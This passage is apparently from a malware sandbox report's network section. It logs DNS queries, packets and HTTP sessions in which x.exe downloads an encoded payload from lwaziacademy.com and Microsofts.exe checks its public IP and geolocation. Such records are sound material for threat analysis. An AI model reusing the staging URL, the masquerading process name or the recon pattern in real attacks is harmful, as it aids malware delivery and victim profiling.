                                                                                                                                    Jan 9, 2025 19:09:58.188698053 CET49866443192.168.2.6104.21.80.1
                                                                                                                                    Jan 9, 2025 19:09:58.188710928 CET44349866104.21.80.1192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:58.713361979 CET44349866104.21.80.1192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:58.713443995 CET49866443192.168.2.6104.21.80.1
                                                                                                                                    Jan 9, 2025 19:09:58.725100994 CET49866443192.168.2.6104.21.80.1
                                                                                                                                    Jan 9, 2025 19:09:58.725121021 CET44349866104.21.80.1192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:58.725392103 CET44349866104.21.80.1192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:58.805267096 CET49866443192.168.2.6104.21.80.1
                                                                                                                                    Jan 9, 2025 19:09:58.870511055 CET49866443192.168.2.6104.21.80.1
                                                                                                                                    Jan 9, 2025 19:09:58.915334940 CET44349866104.21.80.1192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:58.985533953 CET44349866104.21.80.1192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:58.985733986 CET44349866104.21.80.1192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:58.985896111 CET49866443192.168.2.6104.21.80.1
                                                                                                                                    Jan 9, 2025 19:09:58.992854118 CET49866443192.168.2.6104.21.80.1
                                                                                                                                    Jan 9, 2025 19:11:03.046387911 CET8049860158.101.44.242192.168.2.6
                                                                                                                                    Jan 9, 2025 19:11:03.046504021 CET4986080192.168.2.6158.101.44.242
                                                                                                                                    Jan 9, 2025 19:11:38.067051888 CET4986080192.168.2.6158.101.44.242
                                                                                                                                    Jan 9, 2025 19:11:38.072268963 CET8049860158.101.44.242192.168.2.6

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 9, 2025 19:09:47.970244884 CET5028053192.168.2.61.1.1.1
                                                                                                                                    Jan 9, 2025 19:09:48.305686951 CET53502801.1.1.1192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:57.089534998 CET4993353192.168.2.61.1.1.1
                                                                                                                                    Jan 9, 2025 19:09:57.099545002 CET53499331.1.1.1192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:58.173978090 CET5310753192.168.2.61.1.1.1
                                                                                                                                    Jan 9, 2025 19:09:58.181843996 CET53531071.1.1.1192.168.2.6

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Jan 9, 2025 19:09:47.970244884 CET192.168.2.61.1.1.10x79dcStandard query (0)lwaziacademy.comA (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:57.089534998 CET192.168.2.61.1.1.10x17b4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:58.173978090 CET192.168.2.61.1.1.10x1617Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Jan 9, 2025 19:09:48.305686951 CET1.1.1.1192.168.2.60x79dcNo error (0)lwaziacademy.com41.185.8.252A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:57.099545002 CET1.1.1.1192.168.2.60x17b4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:57.099545002 CET1.1.1.1192.168.2.60x17b4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:57.099545002 CET1.1.1.1192.168.2.60x17b4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:57.099545002 CET1.1.1.1192.168.2.60x17b4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:57.099545002 CET1.1.1.1192.168.2.60x17b4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:57.099545002 CET1.1.1.1192.168.2.60x17b4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:58.181843996 CET1.1.1.1192.168.2.60x1617No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:58.181843996 CET1.1.1.1192.168.2.60x1617No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:58.181843996 CET1.1.1.1192.168.2.60x1617No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:58.181843996 CET1.1.1.1192.168.2.60x1617No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:58.181843996 CET1.1.1.1192.168.2.60x1617No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:58.181843996 CET1.1.1.1192.168.2.60x1617No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                    Jan 9, 2025 19:09:58.181843996 CET1.1.1.1192.168.2.60x1617No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • lwaziacademy.com
                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                    • checkip.dyndns.org

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.649860158.101.44.242801664C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 9, 2025 19:09:57.115895987 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Jan 9, 2025 19:09:57.694664001 CET321INHTTP/1.1 200 OK
                                                                                                                                    Date: Thu, 09 Jan 2025 18:09:57 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 104
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Request-ID: 2902970cf9a5858aa7d5698b6d5ea86b
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                    Jan 9, 2025 19:09:57.886435986 CET127OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Jan 9, 2025 19:09:58.045954943 CET321INHTTP/1.1 200 OK
                                                                                                                                    Date: Thu, 09 Jan 2025 18:09:57 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 104
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Request-ID: b740fee158ee6981a84c439741934fbc
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.64981341.185.8.2524435776C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-09 18:09:49 UTC169OUTGET /wps/200_Oupzhkprnvw HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                    Host: lwaziacademy.com
                                                                                                                                    2025-01-09 18:09:49 UTC182INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Thu, 09 Jan 2025 18:09:49 GMT
                                                                                                                                    Content-Length: 906612
                                                                                                                                    Connection: close
                                                                                                                                    Last-Modified: Fri, 20 Dec 2024 10:43:30 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2025-01-09 18:09:49 UTC8009INData Raw: 68 59 32 45 4f 41 4b 47 6b 43 72 2f 2f 76 72 74 2f 41 62 33 2f 41 54 74 41 66 54 74 39 51 55 43 38 50 66 74 37 76 30 41 41 50 54 76 2f 66 73 44 38 2f 66 74 2b 66 50 39 2b 76 6f 45 38 76 54 35 41 2f 48 75 2f 50 49 45 42 66 6b 46 39 77 62 76 39 41 62 31 2b 77 51 46 2f 76 44 76 41 4f 33 31 39 66 6a 7a 42 76 76 35 2b 75 2f 79 2f 66 44 34 2f 66 34 47 38 66 4c 30 41 76 62 30 37 2f 37 35 2b 34 57 4e 68 44 67 43 68 70 41 71 4f 51 48 38 42 76 54 33 2f 50 37 36 41 67 4f 46 6a 59 51 34 41 6f 61 51 4b 72 2b 37 70 70 65 49 7a 63 58 56 79 74 48 43 71 4d 54 44 7a 72 7a 4f 31 4a 2b 61 68 39 66 51 76 63 2f 42 32 4b 33 4b 78 63 62 56 79 37 36 6d 6a 6f 44 4a 78 4d 4b 37 7a 63 75 77 79 64 54 4f 31 63 6e 55 75 70 6d 51 7a 63 50 41 79 73 6d 37 6e 4d 62 51 78 74 6e 5a 32 5a 32
                                                                                                                                    Data Ascii: hY2EOAKGkCr//vrt/Ab3/ATtAfTt9QUC8Pft7v0AAPTv/fsD8/ft+fP9+voE8vT5A/Hu/PIEBfkF9wbv9Ab1+wQF/vDvAO319fjzBvv5+u/y/fD4/f4G8fL0Avb07/75+4WNhDgChpAqOQH8BvT3/P76AgOFjYQ4AoaQKr+7ppeIzcXVytHCqMTDzrzO1J+ah9fQvc/B2K3KxcbVy76mjoDJxMK7zcuwydTO1cnUupmQzcPAysm7nMbQxtnZ2Z2
                                                                                                                                    2025-01-09 18:09:49 UTC16384INData Raw: 44 50 45 30 65 58 68 69 68 62 73 73 35 53 50 68 72 45 45 32 44 68 2f 74 4b 51 62 37 30 39 6e 75 75 74 2b 43 4c 4d 53 6c 79 57 43 4e 4d 43 45 42 71 49 47 6c 75 4a 71 6b 78 6e 59 37 4d 6a 30 4c 34 6e 68 2f 78 45 34 6f 4d 76 38 74 5a 4c 79 72 5a 77 71 31 48 67 52 74 4f 70 6e 6f 42 2f 39 57 4b 42 34 4b 35 71 56 33 37 54 72 70 59 75 35 7a 51 55 32 4d 5a 74 62 2f 6b 36 42 32 37 52 56 54 55 43 6a 38 61 5a 64 69 61 4d 32 6b 4e 59 48 42 67 44 37 50 38 41 68 45 51 32 76 57 57 6f 71 66 30 6b 37 57 59 50 2b 54 57 37 64 39 39 68 77 61 54 4d 72 74 68 63 45 75 48 58 42 58 54 6f 32 66 65 6c 6c 4a 4b 66 51 33 34 6f 30 47 67 6b 2b 37 48 57 30 53 50 6c 5a 70 6a 32 65 33 45 65 31 59 66 6e 2f 69 55 6c 35 59 64 74 52 48 4e 4e 7a 63 53 45 62 58 47 39 33 70 70 41 54 78 53 57 41
                                                                                                                                    Data Ascii: DPE0eXhihbss5SPhrEE2Dh/tKQb709nuut+CLMSlyWCNMCEBqIGluJqkxnY7Mj0L4nh/xE4oMv8tZLyrZwq1HgRtOpnoB/9WKB4K5qV37TrpYu5zQU2MZtb/k6B27RVTUCj8aZdiaM2kNYHBgD7P8AhEQ2vWWoqf0k7WYP+TW7d99hwaTMrthcEuHXBXTo2fellJKfQ34o0Ggk+7HW0SPlZpj2e3Ee1Yfn/iUl5YdtRHNNzcSEbXG93ppATxSWA
                                                                                                                                    2025-01-09 18:09:49 UTC16384INData Raw: 69 2f 70 70 6e 77 62 70 61 55 4c 61 37 4a 30 66 70 62 69 43 54 63 56 37 6c 45 76 78 61 36 6b 45 2b 37 37 46 30 4b 45 72 38 4f 44 78 32 53 4a 66 46 6f 4c 39 78 53 50 45 42 44 31 54 5a 58 49 37 58 76 30 39 61 42 76 58 45 6b 6e 50 41 59 52 5a 71 54 50 2f 79 76 35 4b 35 67 4f 41 44 57 4d 66 38 57 35 6c 48 56 6e 53 62 66 30 53 4c 58 58 58 33 7a 76 49 5a 74 54 54 73 53 2b 69 79 65 37 5a 63 56 4f 30 68 75 36 35 79 6c 43 48 54 39 69 77 57 5a 57 4a 5a 4e 6f 45 36 71 65 78 48 31 31 38 46 2b 61 73 71 69 78 76 34 50 52 6e 73 53 48 6a 30 46 44 6d 77 33 43 32 34 33 37 75 4a 45 6b 6a 38 43 78 68 4f 4e 41 76 76 69 71 58 31 49 45 61 74 75 46 65 68 41 2f 2f 43 6c 34 56 69 31 72 36 6a 4f 31 38 6e 74 58 58 59 6d 51 48 70 54 52 4d 65 4f 6c 75 6e 49 2b 61 68 68 6b 45 72 42 45
                                                                                                                                    Data Ascii: i/ppnwbpaULa7J0fpbiCTcV7lEvxa6kE+77F0KEr8ODx2SJfFoL9xSPEBD1TZXI7Xv09aBvXEknPAYRZqTP/yv5K5gOADWMf8W5lHVnSbf0SLXXX3zvIZtTTsS+iye7ZcVO0hu65ylCHT9iwWZWJZNoE6qexH118F+asqixv4PRnsSHj0FDmw3C2437uJEkj8CxhONAvviqX1IEatuFehA//Cl4Vi1r6jO18ntXXYmQHpTRMeOlunI+ahhkErBE
                                                                                                                                    2025-01-09 18:09:50 UTC16384INData Raw: 6f 6e 32 41 4b 61 45 74 51 70 65 51 42 64 50 63 41 45 56 4b 59 51 37 4b 78 61 37 37 79 6b 2f 35 5a 44 36 72 34 41 4a 64 4f 6f 4e 54 48 4e 37 55 6f 32 46 75 30 6a 34 4f 45 39 68 31 58 49 65 6b 76 58 75 75 6c 67 4e 47 63 6a 43 43 73 64 51 56 72 52 41 63 46 54 64 4b 33 59 64 2f 6b 70 50 65 42 6d 47 55 70 4a 6d 46 4c 4b 4c 52 36 69 43 54 59 69 79 67 59 33 2f 48 6d 4f 73 6b 54 4f 70 6d 50 2b 77 47 6d 62 63 59 48 4d 65 56 6d 2f 4d 69 4a 61 42 35 6f 4d 66 69 39 2b 53 35 62 70 46 4f 52 38 7a 62 61 32 6f 38 61 52 4f 77 62 64 74 61 43 41 79 75 2b 38 30 77 41 32 76 50 51 63 48 57 46 62 54 39 7a 51 64 6d 44 42 4e 38 52 77 4a 35 2b 39 65 39 44 69 36 63 42 44 6a 66 59 43 73 52 52 7a 58 79 55 41 64 47 65 34 2f 48 70 62 44 37 36 67 5a 45 44 79 4b 74 2f 45 67 51 55 65 43
                                                                                                                                    Data Ascii: on2AKaEtQpeQBdPcAEVKYQ7Kxa77yk/5ZD6r4AJdOoNTHN7Uo2Fu0j4OE9h1XIekvXuulgNGcjCCsdQVrRAcFTdK3Yd/kpPeBmGUpJmFLKLR6iCTYiygY3/HmOskTOpmP+wGmbcYHMeVm/MiJaB5oMfi9+S5bpFOR8zba2o8aROwbdtaCAyu+80wA2vPQcHWFbT9zQdmDBN8RwJ5+9e9Di6cBDjfYCsRRzXyUAdGe4/HpbD76gZEDyKt/EgQUeC
                                                                                                                                    2025-01-09 18:09:50 UTC16384INData Raw: 46 52 49 74 59 6b 33 48 79 4a 62 2f 69 72 48 2f 53 77 61 79 62 48 53 2b 70 6e 74 74 56 71 72 54 6f 45 41 47 31 78 69 43 71 4c 2b 46 37 74 53 55 32 55 65 6b 79 4f 52 31 30 72 39 42 79 6f 61 43 2f 79 78 32 75 44 30 39 33 73 65 6c 71 38 48 2f 72 4d 77 79 70 47 69 57 35 57 69 66 69 65 6d 32 42 67 51 42 66 33 79 37 4f 65 76 6b 79 48 62 67 4d 53 57 6e 45 74 66 51 45 6a 39 4a 68 64 33 37 31 73 75 7a 43 62 6f 50 42 56 6e 50 75 30 55 4e 45 68 58 67 57 56 68 61 6a 65 45 46 6c 44 45 78 61 41 44 47 35 65 45 56 75 6d 76 47 4e 43 70 41 56 43 5a 5a 79 7a 32 6e 6a 4d 70 4a 69 48 4d 42 4b 76 2b 50 32 41 71 49 65 72 72 62 32 44 37 62 2f 45 37 64 6c 6d 66 68 6a 69 38 6f 68 45 30 6a 6a 51 4b 4e 64 52 32 52 62 4e 71 50 39 42 52 4e 4c 6e 55 74 46 65 56 68 2f 41 4c 53 56 74 58
                                                                                                                                    Data Ascii: FRItYk3HyJb/irH/SwaybHS+pnttVqrToEAG1xiCqL+F7tSU2UekyOR10r9ByoaC/yx2uD093selq8H/rMwypGiW5Wifiem2BgQBf3y7OevkyHbgMSWnEtfQEj9Jhd371suzCboPBVnPu0UNEhXgWVhajeEFlDExaADG5eEVumvGNCpAVCZZyz2njMpJiHMBKv+P2AqIerrb2D7b/E7dlmfhji8ohE0jjQKNdR2RbNqP9BRNLnUtFeVh/ALSVtX
                                                                                                                                    2025-01-09 18:09:50 UTC16384INData Raw: 4c 35 4e 6c 45 4f 4c 57 6f 56 48 31 68 4a 6c 63 35 51 50 73 34 59 64 45 6b 6f 63 49 67 37 2f 76 5a 61 77 47 78 63 68 39 51 4c 77 2f 4a 76 43 56 4e 49 48 42 6b 54 6f 35 47 33 65 58 39 4e 67 6b 52 4a 52 49 70 4f 39 45 4b 4c 53 75 72 39 38 79 2b 4c 51 30 62 6b 64 38 49 2b 70 46 6a 70 48 65 68 6c 36 4f 4f 6b 31 54 38 65 54 50 68 62 76 74 49 6c 4b 73 79 36 30 61 55 41 63 41 34 39 4f 35 6b 54 6e 51 69 61 7a 65 64 56 4a 66 32 55 35 69 5a 31 6a 69 6d 57 2b 55 70 66 52 72 77 68 61 58 64 56 30 79 75 34 61 4e 32 54 41 35 4f 41 78 37 67 4d 76 30 6d 6b 48 6a 64 36 6f 47 30 6a 4c 7a 67 56 63 51 4b 5a 7a 69 38 36 74 57 2f 39 53 34 53 41 65 56 30 4a 61 4e 6d 34 39 49 58 6a 55 47 32 50 35 38 55 37 44 72 75 51 30 66 61 56 2b 61 70 75 4f 69 59 73 4b 61 52 69 52 6f 30 61 39
                                                                                                                                    Data Ascii: L5NlEOLWoVH1hJlc5QPs4YdEkocIg7/vZawGxch9QLw/JvCVNIHBkTo5G3eX9NgkRJRIpO9EKLSur98y+LQ0bkd8I+pFjpHehl6OOk1T8eTPhbvtIlKsy60aUAcA49O5kTnQiazedVJf2U5iZ1jimW+UpfRrwhaXdV0yu4aN2TA5OAx7gMv0mkHjd6oG0jLzgVcQKZzi86tW/9S4SAeV0JaNm49IXjUG2P58U7DruQ0faV+apuOiYsKaRiRo0a9
                                                                                                                                    2025-01-09 18:09:50 UTC16384INData Raw: 53 50 59 6d 62 41 46 6d 35 59 68 55 6f 4a 32 61 6c 6c 2f 53 6d 53 36 66 53 36 33 61 58 36 49 52 30 42 59 32 62 71 48 53 7a 30 37 73 53 37 77 4c 51 76 43 6e 69 76 67 4f 78 4a 6b 49 69 50 33 64 54 2b 70 6d 2b 44 70 67 57 77 33 59 68 39 49 4a 53 2f 4f 51 38 58 55 76 70 73 35 67 6f 64 75 2b 72 47 74 55 70 71 33 4f 43 36 32 45 4a 53 72 66 6f 2f 47 4e 50 2b 72 79 30 52 78 46 67 78 6c 4c 51 50 58 62 4c 42 46 4c 75 4a 56 69 30 2b 66 6f 6d 65 2f 46 4e 4a 68 39 49 30 38 4b 55 53 4d 71 6d 44 64 4c 4e 2f 48 55 72 65 56 69 31 35 69 64 37 6c 70 49 69 67 33 5a 6b 75 75 4e 45 76 38 53 6c 31 4e 78 2f 64 55 61 39 6c 34 64 4c 4a 44 38 4d 4a 43 6b 6b 69 56 6f 50 4d 35 5a 33 45 73 6f 64 6a 44 6b 5a 71 65 47 41 32 73 43 4e 37 59 77 46 41 52 52 41 2f 70 66 72 4f 64 6a 38 57 41
                                                                                                                                    Data Ascii: SPYmbAFm5YhUoJ2all/SmS6fS63aX6IR0BY2bqHSz07sS7wLQvCnivgOxJkIiP3dT+pm+DpgWw3Yh9IJS/OQ8XUvps5godu+rGtUpq3OC62EJSrfo/GNP+ry0RxFgxlLQPXbLBFLuJVi0+fome/FNJh9I08KUSMqmDdLN/HUreVi15id7lpIig3ZkuuNEv8Sl1Nx/dUa9l4dLJD8MJCkkiVoPM5Z3EsodjDkZqeGA2sCN7YwFARRA/pfrOdj8WA
                                                                                                                                    2025-01-09 18:09:50 UTC13696INData Raw: 57 51 69 43 51 41 7a 32 36 6d 75 37 35 2b 4a 72 30 68 47 47 65 58 49 6d 53 76 55 4e 6d 73 35 63 30 46 48 6d 79 50 66 4c 76 47 31 64 6d 31 6b 46 78 59 33 64 4a 48 63 30 38 36 75 5a 75 52 49 34 2b 62 42 79 49 4d 33 68 4f 52 48 6d 4a 37 67 58 34 66 6a 6f 61 72 74 31 32 53 6b 4d 33 7a 75 74 32 7a 70 38 47 38 42 5a 6a 52 49 43 4a 51 4c 4f 69 6a 33 36 59 46 6a 51 35 6a 71 72 73 30 69 63 64 4f 4e 74 4c 71 35 34 46 65 6c 6c 70 51 48 68 30 35 6d 59 6f 61 75 70 56 74 5a 6c 35 46 70 79 56 39 47 71 6c 72 46 51 45 33 73 70 57 6f 48 55 67 35 77 4d 39 70 65 62 53 66 5a 48 33 6b 71 64 49 5a 78 4a 44 42 72 69 6f 6d 78 48 64 62 78 2b 67 41 4e 4b 44 64 4e 65 5a 76 4b 4c 2b 79 31 41 5a 70 4a 6d 2f 48 4d 39 43 53 45 35 4f 62 52 62 65 51 34 2f 53 54 4b 53 33 51 36 59 5a 6f 43
                                                                                                                                    Data Ascii: WQiCQAz26mu75+Jr0hGGeXImSvUNms5c0FHmyPfLvG1dm1kFxY3dJHc086uZuRI4+bByIM3hORHmJ7gX4fjoart12SkM3zut2zp8G8BZjRICJQLOij36YFjQ5jqrs0icdONtLq54FellpQHh05mYoaupVtZl5FpyV9GqlrFQE3spWoHUg5wM9pebSfZH3kqdIZxJDBriomxHdbx+gANKDdNeZvKL+y1AZpJm/HM9CSE5ObRbeQ4/STKS3Q6YZoC
                                                                                                                                    2025-01-09 18:09:50 UTC8000INData Raw: 53 4e 75 79 6b 6f 6a 4f 79 55 77 76 6c 78 4f 2f 4d 57 55 75 54 45 39 41 79 70 49 4f 36 6b 63 46 4c 77 6c 44 5a 76 56 53 54 41 6b 2b 44 4e 38 36 39 6e 50 6b 39 56 39 47 38 56 7a 56 67 74 63 2b 41 35 53 68 38 4a 6f 58 45 51 42 34 5a 45 5a 69 75 63 4b 56 6e 6b 42 6b 4e 4f 68 6c 4b 61 51 70 61 2b 72 6e 55 4d 35 6e 37 65 4e 38 46 5a 51 30 4a 58 76 68 6c 63 63 50 41 5a 68 35 47 32 51 6a 58 2b 32 33 32 31 4c 7a 33 65 58 6c 30 55 33 30 6b 57 6e 4a 6e 32 55 6a 37 56 37 74 4a 2f 76 35 6f 77 2b 78 4f 57 43 2f 75 52 36 52 6d 59 2b 42 31 45 77 52 66 74 56 6c 4a 4e 39 4d 4c 6f 77 4d 33 2f 6d 73 58 6e 36 47 30 5a 61 54 33 5a 55 61 55 49 49 59 48 6b 47 32 71 6f 6c 64 51 51 52 30 74 44 32 73 2f 32 44 79 54 56 6c 31 67 63 4e 70 78 55 57 55 33 4c 31 73 44 6e 66 52 44 43 75
                                                                                                                                    Data Ascii: SNuykojOyUwvlxO/MWUuTE9AypIO6kcFLwlDZvVSTAk+DN869nPk9V9G8VzVgtc+A5Sh8JoXEQB4ZEZiucKVnkBkNOhlKaQpa+rnUM5n7eN8FZQ0JXvhlccPAZh5G2QjX+2321Lz3eXl0U30kWnJn2Uj7V7tJ/v5ow+xOWC/uR6RmY+B1EwRftVlJN9MLowM3/msXn6G0ZaT3ZUaUIIYHkG2qoldQQR0tD2s/2DyTVl1gcNpxUWU3L1sDnfRDCu
                                                                                                                                    2025-01-09 18:09:50 UTC8000INData Raw: 68 39 33 55 72 68 36 61 42 47 50 4d 4c 52 78 58 74 57 58 66 37 6c 70 61 69 74 73 58 4a 30 4c 4e 75 76 2b 43 47 4f 4a 50 32 6c 4a 4d 74 73 61 52 4f 64 48 37 70 55 31 71 78 72 66 6d 6c 69 4c 64 54 4b 38 46 38 65 47 70 69 6d 45 2f 74 41 68 32 43 6e 54 48 32 72 47 64 54 38 78 70 4c 44 69 65 43 43 53 44 59 6e 34 55 54 69 53 47 45 41 6b 53 6d 67 46 4b 49 59 63 70 63 72 63 37 43 6f 73 45 56 72 37 2f 5a 4c 4b 61 62 69 56 43 36 46 61 64 32 4f 32 6e 30 6a 5a 61 46 36 30 69 70 6c 61 47 38 71 57 2f 72 67 65 63 7a 63 70 66 30 50 68 41 6a 4e 35 5a 79 68 37 45 54 50 72 50 46 74 4c 64 4d 55 4a 34 39 73 52 2f 5a 46 41 54 6d 75 61 33 5a 37 51 37 4b 47 56 49 6a 32 72 57 31 43 5a 65 6b 32 52 43 61 64 61 34 51 59 33 53 4b 36 59 74 48 73 4e 69 62 71 6c 46 79 54 55 37 37 36 54
                                                                                                                                    Data Ascii: h93Urh6aBGPMLRxXtWXf7lpaitsXJ0LNuv+CGOJP2lJMtsaROdH7pU1qxrfmliLdTK8F8eGpimE/tAh2CnTH2rGdT8xpLDieCCSDYn4UTiSGEAkSmgFKIYcpcrc7CosEVr7/ZLKabiVC6Fad2O2n0jZaF60iplaG8qW/rgeczcpf0PhAjN5Zyh7ETPrPFtLdMUJ49sR/ZFATmua3Z7Q7KGVIj2rW1CZek2RCada4QY3SK6YtHsNibqlFyTU776T


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.649866104.21.80.14431664C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-09 18:09:58 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2025-01-09 18:09:58 UTC859INHTTP/1.1 200 OK
                                                                                                                                    Date: Thu, 09 Jan 2025 18:09:58 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 362
                                                                                                                                    Connection: close
                                                                                                                                    Age: 1760988
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    cf-cache-status: HIT
                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ss95Nd%2FvHcmMJM96T8qyoZRBFEmUmXClUqjLU%2FVqcAdS%2B6TWYR1JxxdSP8KukeHrVGrew%2Fo5xidc%2FTgJviXku7LhUVmoJQ4HfGakJWeXyMlSuOBuL9A4gZDtyhBrQPc1okMO38CW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ff661a74ba1c443-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1532&rtt_var=583&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1862244&cwnd=244&unsent_bytes=0&cid=92ce6d36e821e216&ts=294&x=0"
